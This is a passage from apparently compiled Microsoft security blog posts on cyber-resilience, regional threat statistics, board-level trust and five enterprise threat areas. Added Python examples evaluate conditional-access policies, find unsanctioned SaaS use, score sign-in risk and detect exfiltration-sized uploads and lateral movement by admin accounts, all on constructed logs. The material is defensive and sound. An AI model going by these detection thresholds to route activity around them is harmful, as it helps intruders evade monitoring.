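    return any(addr in ipaddress.ip_network(c, strict=False) for c in cidrs)


SEVERITY = {"GRANT": 0, "REQUIRE_MFA": 1, "BLOCK": 2}


def evaluate(signin: SignIn, policies: List[Policy]) -> Tuple[str, List[str]]:
    """Apply every policy that matches the app and user; the most restrictive outcome wins."""
    decision, reasons, matched = "GRANT", [], False
    for p in policies:
        if signin.app not in p.apps:
            continue
        if p.user_groups is not None and not (signin.groups & p.user_groups):
            continue
        matched = True
        if p.require_compliant_device:
            failures = device_failures(signin.device)
            if failures:
                decision = "BLOCK"
                reasons.extend(f"{p.name}: {f}" for f in failures)
                continue  # a blocked sign-in is not offered MFA as a way around the block
        if p.require_mfa_off_network and not on_trusted_network(signin.client_ip, p.trusted_networks):
            if SEVERITY["REQUIRE_MFA"] > SEVERITY[decision]:
                decision = "REQUIRE_MFA"
            reasons.append(f"{p.name}: {signin.client_ip} is outside the trusted networks")
    if not matched:
        reasons.append("no policy covers this app and user; default outcome is GRANT")
    return decision, reasons


# Constructed policies and sign-ins for the demonstration.
POLICIES = [
    Policy("Exchange: compliant device, MFA off-network", apps={"Exchange Online"},
           trusted_networks=["10.0.0.0/8"], require_compliant_device=True,
           require_mfa_off_network=True),
    Policy("SharePoint: compliant device for Finance", apps={"SharePoint Online"},
           user_groups={"Finance"}, require_compliant_device=True),
]
GOOD = Device(managed=True, compliant=True, encrypted=True, passcode_set=True, jailbroken=False)
ROOTED = Device(managed=True, compliant=False, encrypted=True, passcode_set=True, jailbroken=True)


def demo():
    cases = {
        "alice_office":   SignIn("alice", {"Finance"}, "10.1.2.3",    "Exchange Online",   GOOD),
        "alice_cafe":     SignIn("alice", {"Finance"}, "203.0.113.5", "Exchange Online",   GOOD),
        "bob_rooted":     SignIn("bob",   {"Sales"},   "10.1.2.3",    "Exchange Online",   ROOTED),
        "bob_sharepoint": SignIn("bob",   {"Sales"},   "203.0.113.5", "SharePoint Online", ROOTED),
    }
    return {name: evaluate(s, POLICIES) for name, s in cases.items()}


if __name__ == "__main__":
    for name, (decision, reasons) in demo().items():
        print(f"{name}: {decision} {reasons}")
```

The last case is the one worth noticing: bob’s rooted device reaches SharePoint because the only SharePoint policy is scoped to the Finance group, so nothing applies and the default is to grant. Whatever product enforces conditional access, the coverage of the policy set (every app, every user, every platform) is the check to make before trusting the decision it produces.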

To learn more about BYOD security, download the free eBook, Protect Your Data: 7 Ways to Improve Your Security Posture.

 

Cybersecurity and cyber-resilience – Equally important but different

November 3rd, 2016 No comments

The October Mirai-based IoT attack demonstrated an important and often neglected consequence of technology’s expansion into every aspect of our daily lives, as well as into the systems that underpin our economies and societies. We have never been as exposed to cyberattacks, and because of technology’s pervasiveness in our lives the possible consequences of attacks such as last month’s are going to be more widespread and troublesome than in the past.

The particulars of the attack, from its scale to the use of everyday devices such as webcams, are interesting and worrying in themselves (see here and here for excellent pieces), but they also raise a key question. Security professionals have long accepted that no interconnected system will ever be 100% secure, and that there will soon come a time when even the fundamental underpinnings of the Internet itself could be put at genuine risk of failure by cyberattacks. If so, should the resources we put into preventing successful cyberattacks be matched by our preparations for handling a successful attack’s consequences? In other words, shouldn’t cyber-resilience be treated on a par with cybersecurity?

From a policy-making perspective, one challenge in answering this question is that there is no global definition of cyber-resilience, and therefore only limited agreement on how to achieve it. Even if we sidestep this theoretical hurdle and consider how we could design our systems (social, commercial, political) so that they could continue to operate at some level in the face of “black-swan” violations of their fundamental assumptions, we are not much closer to a solution. Suggesting we plan for even a brief period where, for example, there is simply no electricity may seem like planning for the sun not rising one morning. The reality, however, is that cyberattacks are not zero-sum games in which a breach means unavoidable system failure. With complex technologies there will be as many ways of working around an attack as there are ways of carrying it out. Investing in cyber-resilience will make this practicable.

How could that be achieved? I believe it will be critical that we focus on readiness, responsiveness and being able to reinvent our systems and processes over the course of a cyberattack. Readiness is a long-term function, underpinned by assessing and managing risks, and developing capabilities for response and recovery in the event of disruptions. Responsiveness is the detection, identification and alleviation of a cyberattack as it happens, keeping systems functioning in the process of doing so. Reinvention will lead off from the response, and should seek to adapt to what might be either a period of extended stress or a short, sharp shock, finding new ways to protect systems and deliver services that have been disrupted.

The structures and processes necessary for this kind of cyber-resilience are distinct from those that go into cybersecurity, although there are some shared technical skills and processes. For any organization realistically comparing its cybersecurity needs with its cyber-resilience needs, however, the differences between the two are clear. Specifically, resilience requires there to be a focus on culture, as much as there is on technology. Organizational leadership needs to set forward-looking, outcome-oriented goals with clear accountability, and to foster planning at all levels. Creativity in managerial, operational, and technological approaches is also essential, encouraging teams facing the consequences of a cyberattack to take risks, fail fast, learn faster, and maintain a can-do attitude in the face of adversity. Investment in research, education, and identification of best practices needs to underpin this cultural aspect in the long-term.

In conclusion, cybersecurity and cyber-resilience should be recognized as two distinct, but complementary disciplines. These disciplines grow more crucial with the rapid evolution and increasing ubiquity of technology in our modern society. For now, cybersecurity gets more headlines than resilience amongst political and business leaders, but one without the other will never be enough to secure our societies and economies or sufficient to withstand the chronic stresses and acute shocks.

 

Categories: cybersecurity, Cybersecurity Policy

How cyber threats affect enterprise and consumer devices

Over the past decade, Microsoft has methodically studied the evolving cyber threat landscape. We share what we learn twice a year in our Security Intelligence Report, and the most recent issue reveals some important differences between the threats consumer devices and enterprise devices encounter.

Attackers don’t view all attack vectors equally – home computer users and enterprise users tend to be exposed to a different mix of threats due to different usage patterns. These usage patterns can influence the type of cyber-attack attempted. Typically, users in work settings perform business activities while connected to a company network. Users in these situations may also have limitations regarding use of the Internet and email for personal use.

On the other hand, consumers generally connect to the Internet directly or use a home router (a personal network). Here, consumers more often use computers for activities like social media, personal email, playing games, watching videos, consuming content, and shopping.

Active Directory Domains vs. Non-Domains

Microsoft antimalware products and tools produce telemetry data that reveals whether infected computers belong to an Active Directory Domain Services (ADDS) domain. (Computers that do not belong to an ADDS domain are more likely to be for personal or other non-enterprise use.)

By comparing the threats ADDS computers encounter with those of non-ADDS computers, we can gain compelling insights into the stark differences between personal and enterprise security attacks and can begin to understand which threats are most likely to succeed in each environment.

As the following table shows, enterprise computers encounter less malware and encounter different kinds of threats than consumer computers do.

[Table] Malware and unwanted software encounter rates by category for domain-based and non-domain computers during the second half of 2015.

Our analysis of related data collected over the course of 2015 reveals the following:

  • Non-domain computers encountered disproportionate amounts of unwanted software compared to domain-based computers, with Adware, Browser Modifiers, and Software Bundlers each appearing between three and six times as often on non-domain computers
  • Domain-based computers encountered exploits nearly as often as their non-domain counterparts, despite encountering less than half as much malware as non-domain computers overall
  • Six families—Win32/SupTab, Win32/Diplugem, Win32/Gamarue, Win32/Skeeyah, Win32/Peals, and Win32/OutBrowse—were common to both lists; all were more frequently encountered on non-domain computers than on domain-joined computers
  • The four families that were unique to the top ten list for domain-joined computers but not for non-domain computers are the exploit kit JS/Axpergle, the Trojan family Win32/Dorv, the worm family Win32/Conficker, and the generic detection INF/Autorun

In addition, the encounter rate for consumer computers was about 2.2 times as high as the rate for enterprise computers during the second half of 2015.

How to stay updated on emerging threats

The threat landscape has changed dramatically in recent years. Constant vigilance is needed to maintain visibility into emerging vulnerabilities so you can make the adjustments necessary to help protect your organization and customers. From big data analysis to continuous machine learning and human intelligence, security demands a holistic approach to ensure your organization is prepared to handle new attacks.

Visit www.microsoft.com/security/sir to gain a deeper understanding about the security threats that affect your environment. Learn more about Security at Microsoft Secure.

Securing the Internet of Things: Introducing the Security Program for Azure IoT

This post is authored by Sam George, Partner Director Program Management, Azure IoT

As the Internet of Things (IoT) continues to gain traction in the enterprise, questions of security and privacy are top of mind for business decision makers, executives and IT alike. In our work with customers, we find many businesses are struggling to determine how secure their end-to-end IoT infrastructure is, or even delaying IoT implementations until security best practices and standards can be established and confirmed.

Our goal at Microsoft is to keep our customers’ IoT solutions secure. We already do this on multiple levels, from the cloud, including Azure’s enterprise-grade security, working with standards bodies on IoT security, and providing comprehensive security recommendations and guidance, down to individual assets, which only support secure protocols when connecting to devices, and the Windows 10 IoT Core secure IoT operating system.

While these are all important aspects of IoT security, we have heard from enterprises that they want additional security assurances to make sure they have assembled their IoT solutions in a secure way from devices, to connectivity, to cloud.

Today, I’m thrilled to announce the Security Program for Azure IoT. This new program brings together a curated set of best-in-class security auditors that customers can choose from to perform a security audit of their IoT solutions, find issues and provide recommendations. The Security Program for Azure IoT will work from the ground up, examining everything from a business’s devices and assets to gateways and even communication to the cloud.

Our initial best-in-class security auditors are Casaba Security LLC, CyberX, Praetorian, and Tech Mahindra, and the list will expand as the program grows. Microsoft will also be working with these security auditing partners and standards organizations, such as the Industrial Internet Consortium (IIC), to establish industry protocols and best practices for security auditing. This is part of our commitment to establish a vibrant and safe IoT ecosystem.

In all our security efforts, Microsoft works with security partners to help protect businesses – and ultimately help us raise the bar across the industry. Select Azure IoT customers will be the first to take advantage of this program to evaluate their end-to-end IoT infrastructure and manage their security risk. In the coming months, we’ll continue to provide updates on the Security Program for Azure IoT, our global auditing partners, and auditing standards.

In the meantime, we invite you to learn more from our Securing Your IoT Deployment and Securing Your Internet of Things from the Ground Up whitepapers. You can also read more about our public recommendations for cybersecurity and IoT standards or attend our upcoming talk at IoT Solutions World Congress on Trustworthy Internet of Things Infrastructure. For more information about the security auditing program, please visit our partner page on www.InternetofYourThings.com.

Security Intelligence Report: Discover the top cybersecurity threats by country

Security professionals know there’s no silver bullet to achieve perfect security; the volume and magnitude of cyber threats vary considerably depending on country and threat type. For example, during the second half of 2015 (2H15), encounter rates for some types of threats in Russia and Brazil were nearly three times the worldwide average. Of the ten most commonly encountered threat families in Russia in 2H15, five were trojans, including Win32/Peals, Win32/Skeeyah, Win32/Dynamer, and Win32/Spursint. And in Brazil, Win32/SupTab and the downloader/dropper families Win32/Sventore and Win32/Banload topped the threat list.

To help track the constantly shifting security terrain and meet demand for insights, twice each year Microsoft publishes the Security Intelligence Report (SIR), a comprehensive security analysis based on data we collect from around the world. The latest findings were published in May.

A relative look at the worldwide prevalence of malware

The current SIR gives an overarching view of the security situation around the world during the second half of 2015. It also provides more granular details to help you understand specific threats facing the areas you are concerned about right now.

Here are some of the country-specific malware patterns described in the SIR:

  • France and Italy both had high encounter rates for Browser Modifiers, led by Win32/SupTab and Win32/Diplugem.
  • Russia had a significantly higher encounter rate for Trojans than the other locations listed, led by Win32/Peals, Win32/Skeeyah, Win32/Dynamer, and Win32/Spursint; all four Trojans disproportionately affected computers in Russia and eastern Europe in the fourth quarter of 2015.
  • Worms were particularly prevalent in Brazil, led by VBS/Jenxcus, Win32/Gamarue, and JS/Bondat.
  • The highest encounter rates for adware were in Brazil, France, and Italy; Win32/EoRezo was the most commonly encountered adware family in all three locations.
  • Viruses were particularly prevalent in China, led by DOS/JackTheRipper and Win32/Ramnit.

The following table shows the relative prevalence of various categories of malware in several locations around the world in the fourth quarter of 2015. Here are some tips for interpreting the findings:

  • Within each row, darker colors indicate more prevalent categories in each location.
  • Lighter colors signify that the threat category is less common.
  • The locations are arranged by the number of computers that reported threat detections during the second half of 2015.

[Table] The relative prevalence of different categories of malware in the fourth quarter of 2015 in several countries around the world.

Read the full report to learn more about security threats in your region and better understand what location-specific factors may affect your ability to create a secure environment for your organization.

Factors that cause high cybersecurity infection rates

Threat dissemination can be highly dependent on language and socioeconomic factors. In addition, distribution methods can play a considerable role. For instance:

  • Attackers frequently use techniques that target people based on their native language.
  • For threat vectors, attackers employ online services that are local to a specific geographic region.
  • In some situations, attackers target vulnerabilities or operating system configurations and applications that show up disproportionately in a given location.

Microsoft’s commitment to ongoing cybersecurity analysis

We are committed to helping reduce cyber threat infection rates on a regional and global scale. The SIR is just one aspect of this work. Through the regularly updated insights it provides, we aim to inform policymakers and IT professionals about malware trends, and arm them to act accordingly.

We encourage you to evaluate your security stance in the light of our latest SIR report, so you can help defend your organization against the most significant risks it faces.

Visit www.microsoft.com/security/sir today to discover the security risks that threaten your organization. To learn more about Microsoft’s Security products visit us at Microsoft Secure.

Cybersecurity: a question of trust

This post is authored by Robert Hayes, Senior Director and Chief Security Advisor in Microsoft’s Enterprise Cybersecurity Group.

With the scale, scope, and complexity of cyber-attacks increasing by the week, cybersecurity is increasingly being seen as a primary issue for CEOs & Boards.

Advice is not hard to find, and there are a multitude of information sources and standards; the in-house CIO will have a view, and of course there are a myriad of vendors, each with a solution that promises to be the answer to all security problems.

Trust is at the heart of a successful security strategy, yet knowing who and what can be trusted, and whether that trust should be absolute or conditional, is extremely difficult.

In my conversations with CEOs I often ask them their degree of trust in five key security related areas:

  • The people who work in their organization
  • The organizations in their supply chain
  • The integrity, resilience & security of their existing infrastructure
  • The integrity, resilience & security of cloud based infrastructures
  • The advice they receive, both internal & external

Unsurprisingly, the answer to each question is always a varying degree of conditional trust, never absolute trust.

The conversation becomes interesting when the CEO and I jointly explore whether the infrastructure, processes, and policies of their organization actually reflect that intent to avoid absolute trust in these five key areas. Invariably, the answer is no.

Recurring examples of this inconsistency, each carrying significant organizational risk, are:

  • IT administrators having unfettered and unaudited access to all corporate systems, without effective security mitigations such as multi-factor authentication and privileged access workstations in place.
  • HR departments not instructing IT to revoke a user’s access privileges until days, often weeks, after the employee is terminated or leaves the company.
  • Supply chain contracts drawn up with no security provisions, standards, or audit clauses.
  • No due diligence or impartial advice at Board level on the assurances and assertions made by both in-house IT teams and vendors on integrity, resilience and security.

A common closing theme of these conversations is the need for CEOs and Boards to have impartial advice and support to help them robustly challenge and undertake effective due diligence in this critical area, and the difficulty achieving this.

In the US, proposed SEC regulation would mean that companies, in particular publicly listed firms, must have a cyber expert on their Board, yet there are currently very few executive or non-executive directors with this skill set who are comfortable operating at Board level.

An alternative, but expensive position is to buy in the skill set from a third party, and there are many consultancies who will be delighted to have this conversation. However, some consultancies also have a vested interest in system integration, and their advice may not be as impartial as it seems.

Finally, there exists the challenging option of changing the relationship with key suppliers away from the classic customer – vendor to one closer to trusted strategic partner, supported by a robust due-diligence process. Many organizations are seeking to move closer to this type of relationship, whilst still maintaining sufficient distance to satisfy probity and procurement rules.

Whilst each of these options has challenges, the reality remains that without a trusted cybersecurity advisor, CEOs and Boards will continue to make decisions without effective challenge or scrutiny, leaving their organization vulnerable to cyberattack.

To learn more about how Microsoft can help you ensure security while enabling your digital transformation, visit us at Microsoft Secure.

Robert Hayes is a Senior Director and Chief Security Advisor in Microsoft’s Enterprise Cybersecurity Group.

Categories: cybersecurity, SEC, security

Top Five Security Threats Facing Your Business and How to Respond

This post was authored by Ann Johnson, Vice-President, Enterprise Cybersecurity Group

Headlines highlighting how vulnerable we are to cyber threats are now all too commonplace. The statistics on security events and successful network breaches continue a trend that favors attackers. These bad actors are getting faster at network compromise and data theft, while their dwell times inside networks have increased to over 200 days according to most of the major annual cybersecurity reports. The result of these voluminous and persistent threats has been hundreds of millions of dollars in lost business alone, without counting the long-term costs of diminished customer and citizen confidence.

Still, organizations may face even greater risks as they try to fend off sophisticated attackers against a backdrop of an ever-expanding network footprint. The new network now includes myriad personal devices, virtualized workloads, and sensors that represent rapidly increasing points of connectivity, as well as potential compromise.

When considering these trends, it is clear that the traditional means of protecting organizations are not as effective as they once were. Static access controls like firewalls and intrusion prevention systems placed at network ingress and egress points are easily evaded by attackers because the communication paths in and out of networks are too complex and dynamic. Also, the broad use of personal devices inside corporate networks has dissolved what used to be a hardened network boundary. We no longer conduct business within a perimeter of highly controlled, corporate-issued end-user devices that gain access only under the strictest authentication and authorization controls. Instead, the modern enterprise enables dynamic communities of employees, contractors, business partners and customers, along with their data and applications, all connected by an agile digital fabric that is optimized for sharing and collaboration.

In today’s networks, then, identity is the new perimeter to be protected. Identity in this case means not only the device and its physical location but also the data, applications and user information it holds. Given that 60% of all breaches still originate at an endpoint compromised through a phishing scam or social engineering attack, it is no wonder that a risk mitigation strategy with identity at its center is top of mind for many business and technology leaders.

In fact, cybersecurity is a boardroom-level agenda item today. Business leaders want to ensure that they have in place the investments necessary to protect intellectual property and customer data, keeping their businesses out of the headlines that damage reputation and affect profitability. CIOs and CISOs feel caught between the seemingly opposing goals of enabling digital transformation while protecting data and intellectual property at all times. These are concerns they share with their teams in IT and operations, who feel equally burdened to balance performance and accessibility with rightful and appropriate resource use. Cybersecurity, as we have all come to understand, can be either a critical barrier or a key enabler to an organization’s ability to be productive. Current top-of-mind concerns for protecting the modern enterprise coalesce around five key areas: infrastructure, SaaS, devices, identity and response.

1. Infrastructure – The public cloud offers enormous potential for scaling a business. On-demand compute and storage are only a small portion of the benefits of a highly agile IT environment. Easy access to applications, services and development environments promises to redefine business agility. Naturally, more and more organizations are taking critical workloads to the public cloud. Still, the migration to an environment that is provisioned and managed by a third party creates new security challenges. So the top-of-mind question is: “How do I secure my cloud resources?”

Going to the cloud does not mean relinquishing security control or accepting a security posture that is weaker for cloud-hosted workloads than for on-premises ones. In fact, the choice of cloud provider can mean access to the very latest security technologies, more granular control and faster response than is possible in traditional networks. Responsibility is shared, however: the provider secures the underlying platform, while the customer remains responsible for configuring the identity, access and data controls on top of it. As a first step, security stakeholders need to understand how sensitive and compliance-intensive their cloud-hosted workloads and data are. They should then opt for access controls that limit use to only what is business-appropriate, mirroring the access policies already in place for on-premises workloads. Enabling access monitoring for cloud workloads also ensures that any event which deviates from the desired security policy can be flagged as an indicator of possible compromise. Cloud users should also be familiar with the security technologies their provider offers, whether native or through partnership. This gives them options for implementing the kind of multi-tiered security architecture required to enforce least-privilege access, inspect content and respond to potential threats.

Key takeaways

  • Monitor workload access and security policies in place
  • Identify deviations from security policies and indicators of possible compromise
  • Deploy new security controls appropriate for your cloud environment

2. SaaS – Whether a business is hosting critical workloads in the public cloud or not, its employees are surely using applications there. The convenience and ubiquity of these applications means broad user adoption for the ease of information sharing and collaboration they enable. As a result, important, security- and compliance-sensitive data may be making its way to the public cloud without the knowledge of security stakeholders. The question from businesses then is: “How do I protect my corporate data?”

Organizations want to make sure their employees are as productive as they can be. To that end many are allowing them to bring their own devices, and even their own applications, into the network. This agility comes with added security risk. Fortunately, there are ways to mitigate it. Ultimately the goal is to derive all of the benefits these SaaS applications offer without violating company use and compliance policies for data sharing and storage. Additionally, firms must ensure that employees’ use of SaaS apps does not unwittingly enable data exfiltration by bad actors. Limiting risk comes down to enacting a few basics that ensure safe use. For starters, there is a need to identify which SaaS applications are in use in the network and whether they are in line with company policy or on a sanctioned list. Granular rights management then limits the use of even the sanctioned apps to those persons who have a business need for them. Where possible, policies should require data to be encrypted at rest, especially when it is stored in the cloud. Periodically updating the sanctioned list and monitoring all use, typically through proxy or firewall logs, lets security administrators be alerted promptly when an unsanctioned application appears in an organization’s traffic. When unwanted application use is detected, that is the time to block the application, modify or revoke the privileges that allowed access to it and, as a further precaution, remotely wipe or delete the company data stored through it.

Key takeaways

  • Apply rights management, identify unsanctioned apps, contain, classify and encrypt data
  • Be notified of unauthorized data access or attempts
  • Block suspicious apps, revoke unauthorized access and remotely wipe company data
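The first step above, discovering which SaaS applications are actually in use and whether they are sanctioned, is straightforward to automate from the logs an organization already has. The following Python example is added here and is not code from the original post or from any Microsoft product. The proxy log lines, the domain-to-application catalogue and the sanctioned list are all constructed for the example; in practice the catalogue would come from a CASB or similar feed. It resolves each request to an application, reports the unsanctioned ones with the users and upload volume involved, and raises an alert on large uploads to unsanctioned apps, which is the exfiltration signal worth acting on first.

```python
"""Shadow-SaaS discovery over web-proxy logs (added example, not from the post)."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample proxy lines: timestamp user method url bytes_sent bytes_received
SAMPLE_LOG = """\
2018-01-10T09:01:12Z alice GET https://teams.microsoft.com/api/chat 512 20480
2018-01-10T09:03:44Z bob POST https://www.dropbox.com/upload 52428800 1024
2018-01-10T09:05:01Z alice POST https://onedrive.live.com/upload 1048576 2048
2018-01-10T09:07:30Z carol POST https://pastebin.com/post 40960 512
2018-01-10T09:09:15Z bob POST https://www.dropbox.com/upload 31457280 1024
2018-01-10T09:10:00Z dave GET https://unknown-saas.example/dashboard 256 8192
"""

# Assumed domain-to-application catalogue (a real one comes from a CASB feed)
APP_CATALOGUE = {
    "teams.microsoft.com": "Microsoft Teams",
    "onedrive.live.com": "OneDrive",
    "www.dropbox.com": "Dropbox",
    "pastebin.com": "Pastebin",
}
# Assumed sanctioned list: everything else is "shadow" SaaS
SANCTIONED = {"Microsoft Teams", "OneDrive"}


def parse_line(line):
    """Split one constructed log line into a request record."""
    ts, user, method, url, sent, received = line.split()
    host = urlsplit(url).hostname
    return {
        "ts": ts, "user": user, "method": method, "host": host,
        "app": APP_CATALOGUE.get(host, f"unknown ({host})"),
        "sent": int(sent), "received": int(received),
    }


def find_unsanctioned(log_text, sanctioned=SANCTIONED,
                      upload_alert_bytes=10 * 1024 * 1024):
    """Return (summary, alerts).

    summary maps each unsanctioned app to the users seen and bytes uploaded;
    alerts lists (user, app, bytes) for uploads at or above the threshold,
    since a large POST to an unsanctioned app is the exfiltration signal.
    """
    usage = defaultdict(lambda: {"users": set(), "bytes_sent": 0})
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        if ev["app"] in sanctioned:
            continue                      # sanctioned app: nothing to report
        entry = usage[ev["app"]]
        entry["users"].add(ev["user"])
        entry["bytes_sent"] += ev["sent"]
        if ev["method"] == "POST" and ev["sent"] >= upload_alert_bytes:
            alerts.append((ev["user"], ev["app"], ev["sent"]))
    summary = {app: {"users": sorted(v["users"]), "bytes_sent": v["bytes_sent"]}
               for app, v in usage.items()}
    return summary, alerts


if __name__ == "__main__":
    summary, alerts = find_unsanctioned(SAMPLE_LOG)
    for app, info in summary.items():
        print(f"{app}: users={info['users']} uploaded={info['bytes_sent']} bytes")
    for user, app, nbytes in alerts:
        print(f"ALERT large upload: {user} -> {app} ({nbytes} bytes)")
```

Unknown hosts are reported as their own bucket rather than silently dropped, because an application the catalogue has never heard of is exactly the kind of use that should end up in front of an administrator.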

3. Devices – Smartphones, tablets, self-sourced laptops: these are the new network perimeter and at times its weakest links. Whether owned by the organization or not, they almost certainly contain business-valuable data that is at high risk. Because mobile devices often connect from public networks and may not have the most up-to-date protections, these endpoints are popular targets for malware, including bots that enroll the device in a botnet. Use of personally sourced devices is a new and seemingly permanent reality, prompting organizations to ask broadly: “How do I keep company information secure?”

Many years ago, risk from mobile devices was ameliorated by installed agents and thick clients that provided security controls right on the device itself, managed centrally. Today, with employee self-sourced devices, the installation of such clients is not always feasible. Still, today’s security administrators have to accommodate a heterogeneous end-user device environment comprised of various form factors and OSes while applying consistent, organizationally sanctioned controls to all of them. A cloud-based approach can provide a lot of flexibility and control here. From the cloud, endpoint connectivity to network resources can be centrally managed through security policies that restrict where devices can go based on their security posture, installed protections or location-based access rights. Command of devices from a central location ensures not only consistent policy enforcement but automation, so that when anomalous device behaviors or connection patterns are detected, the central service can restrict access, quarantine the affected device and even wipe it (or, for a personally owned device, selectively wipe the company data on it) so that the threat is fully contained.

Key takeaways

  • Manage company and personal devices to classify and encrypt data to ensure compliance
  • Automatically identify compromised or questionable end points
  • Quickly respond to quarantine, wipe and remediate compromised devices

4. Identity – Despite all of the investments organizations make in security and threat mitigation, identities will be compromised. The latest data tells us that far too many of us click on links and attachments that we should not. From that point on, the bad actor has gained a foothold in the network and may set about moving laterally, looking for sensitive information to steal while impersonating the legitimate user. This common scenario is what makes many businesses ask: “How can I ensure identity protection?”

All of the major cybersecurity reports and indices point to this as the most common component of a data breach: the stolen identity. A security strategy for any organization or business needs to have this as a central tenet. The protection and management of the credentials that give resource access to customers, employees, partners and administrators is foundational to sound security practice. Implementing multi-factor authentication broadly, for all applications and services, is a good starting point. It should nevertheless be complemented by monitoring of authentication and authorization events, not only for ordinary users but also, and especially, for privileged users and administrators. This type of monitoring offers the best opportunity to spot attackers trying to move laterally and escalate privilege with stolen credentials. Once a sign-in or request is flagged as anomalous, automated response can raise the access requirements on the fly, for example by demanding a second factor or a managed device, and hold privilege escalation requests until they are verified as legitimate.

Key takeaways

  • Augment passwords with additional authentication layers
  • Identify breaches early through proactive notification of suspicious behavior
  • Automatically elevate access requirements based on your policy and provide risk-based conditional access
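The device posture signals from section 3 and the identity signals from section 4 come together in one decision: what does this sign-in have to prove before it is allowed? The Python example below is added here and is not code from the original post or from any Microsoft service. The event schema, the per-user baselines, the scoring weights and the thresholds are all assumptions chosen to illustrate the idea. It does two things: scores a single sign-in from device posture plus identity risk and maps it to allow, require MFA or block, and then watches privileged sign-ins over time for the pattern of one admin account authenticating to many hosts in a short window, which looks like stolen credentials being reused for lateral movement rather than a person doing interactive work.

```python
"""Risk-based conditional access and privileged sign-in monitoring
(added example, not from the post; schema and weights are assumptions)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed per-user baseline: countries and device IDs seen in the last 90 days
BASELINE = {
    "alice": {"countries": {"US"}, "devices": {"LAPTOP-01"}},
    "admin-bob": {"countries": {"US"}, "devices": {"PAW-07"}},
}
# Accounts that hold administrative roles
PRIVILEGED = {"admin-bob"}


def evaluate_signin(ev, baseline=BASELINE):
    """Score one sign-in event and map it to allow / require_mfa / block.

    ev has the assumed fields: user, device, device_managed (bool), country.
    """
    known = baseline.get(ev["user"], {"countries": set(), "devices": set()})
    score, reasons = 0, []
    if not ev["device_managed"]:
        score += 2
        reasons.append("unmanaged device")
    if ev["country"] not in known["countries"]:
        score += 2
        reasons.append("unfamiliar country")
    if ev["device"] not in known["devices"]:
        score += 1
        reasons.append("new device")
    if ev["user"] in PRIVILEGED:
        score += 1
        reasons.append("privileged account")
        # Admin accounts only ever get in from managed devices, whatever the score
        if not ev["device_managed"]:
            return {"decision": "block", "score": score, "reasons": reasons}
    if score == 0:
        decision = "allow"
    elif score <= 3:
        decision = "require_mfa"      # elevate requirements on the fly
    else:
        decision = "block"
    return {"decision": decision, "score": score, "reasons": reasons}


# Constructed successful-logon events (timestamp, account, target host)
SAMPLE_LOGONS = [
    {"ts": "2018-01-10T22:00:05", "user": "admin-bob", "host": "FS-01"},
    {"ts": "2018-01-10T22:01:10", "user": "admin-bob", "host": "FS-02"},
    {"ts": "2018-01-10T22:02:30", "user": "admin-bob", "host": "SQL-01"},
    {"ts": "2018-01-10T22:04:00", "user": "admin-bob", "host": "DC-01"},
    {"ts": "2018-01-10T22:05:00", "user": "alice", "host": "FS-01"},
]


def detect_lateral_movement(events, max_hosts=3, window=timedelta(minutes=10)):
    """Flag privileged accounts that log on to more than max_hosts distinct
    hosts inside a sliding window. Returns (user, window_start, hosts) tuples."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["user"] in PRIVILEGED:
            by_user[ev["user"]].append((datetime.fromisoformat(ev["ts"]), ev["host"]))
    findings = []
    for user, logons in by_user.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) > max_hosts:
                findings.append((user, start.isoformat(), sorted(hosts)))
                break                 # one finding per account is enough to alert
    return findings


if __name__ == "__main__":
    print(evaluate_signin({"user": "alice", "device": "LAPTOP-01",
                           "device_managed": True, "country": "US"}))
    print(evaluate_signin({"user": "admin-bob", "device": "HOME-PC",
                           "device_managed": False, "country": "US"}))
    print(detect_lateral_movement(SAMPLE_LOGONS))
```

Note that a privileged account never scores zero, so an administrator is always asked for a second factor, and the unmanaged-device rule for administrators is a hard block rather than a score contribution: the cost of being wrong is too asymmetric to leave to a weighted sum.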

5. Response – Each year organizations are subjected to tens of thousands of security events, making the business of protecting critical assets a continuous one. Given that threat dwell times are 200-plus days, bad actors have ample opportunity to move “low and slow” through networks after the initial compromise. Naturally, security administrators and stakeholders are left to ask: “How can I better respond to ongoing threats?”

The potency and frequency of today’s cyber threats require a security strategy built on the assumption of compromise. A network or device may not be breached today but remains at risk, so the process of protecting, detecting and responding to a breach is a continuous one. The data exchanged by endpoints and shuttled among data centers and hybrid clouds contains a lot of information about the security state of those endpoints and resources. The key to unlocking that intelligence is analytics, and specifically the kind of analytics that machine learning makes possible. Having the ability to monitor large amounts of traffic and information continuously and to unearth anomalous behavior is, and will remain, key to shortening the time to detection of a breach or compromise. Behavioral analytics not only tell us what is out of the norm or unwarranted but also inform us of good and desired connectivity. By understanding both anomalous and appropriate traffic patterns, organizations can fine-tune access controls that are just right for enabling business while limiting risk. Further, with continuous analytics the process of determining the right access controls for the environment at a given time can be as dynamic and responsive as users’ access needs.

Key takeaways

  • Use analysis tools to monitor traffic and search for anomalies
  • Use learnings from behavioral analysis to build a map of entity interactions
  • Practice just in time and just enough access control
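The two halves of that takeaway list, learning the map of normal entity interactions and then using it to find deviations, can be shown on flow records. The Python example below is added here and is not code from the original post or from any Microsoft product. The flow records and the volume threshold are constructed assumptions. A training window establishes which (source, destination, port) pairs are normal and how much data each pair usually moves; a later observation window is then scored for interactions that were never seen (the fingerprint of lateral movement) and for known interactions moving far more data than their baseline (the fingerprint of exfiltration). The same learned map is what a team would consult when deciding which access paths to permit under a just-enough-access policy.

```python
"""Baseline-and-deviation analytics over network flow records
(added example, not from the post; records and thresholds are constructed)."""
from collections import defaultdict
from statistics import median

# Constructed flow records: (src, dst, dport, bytes), a training window of normal traffic
TRAINING = [
    ("ws-alice", "fs-01", 445, 20_000), ("ws-alice", "fs-01", 445, 25_000),
    ("ws-alice", "fs-01", 445, 18_000), ("ws-alice", "proxy", 8080, 300_000),
    ("ws-alice", "proxy", 8080, 280_000), ("ws-bob", "fs-01", 445, 40_000),
    ("ws-bob", "proxy", 8080, 150_000), ("fs-01", "sql-01", 1433, 5_000),
]
# Constructed observation window to score against the baseline
OBSERVED = [
    ("ws-alice", "fs-01", 445, 22_000),        # normal
    ("ws-alice", "proxy", 8080, 3_000_000),    # ~10x the usual: possible exfiltration
    ("ws-alice", "sql-01", 1433, 4_000),       # never seen before: possible lateral move
    ("ws-bob", "proxy", 8080, 160_000),        # normal
]


def learn_baseline(flows):
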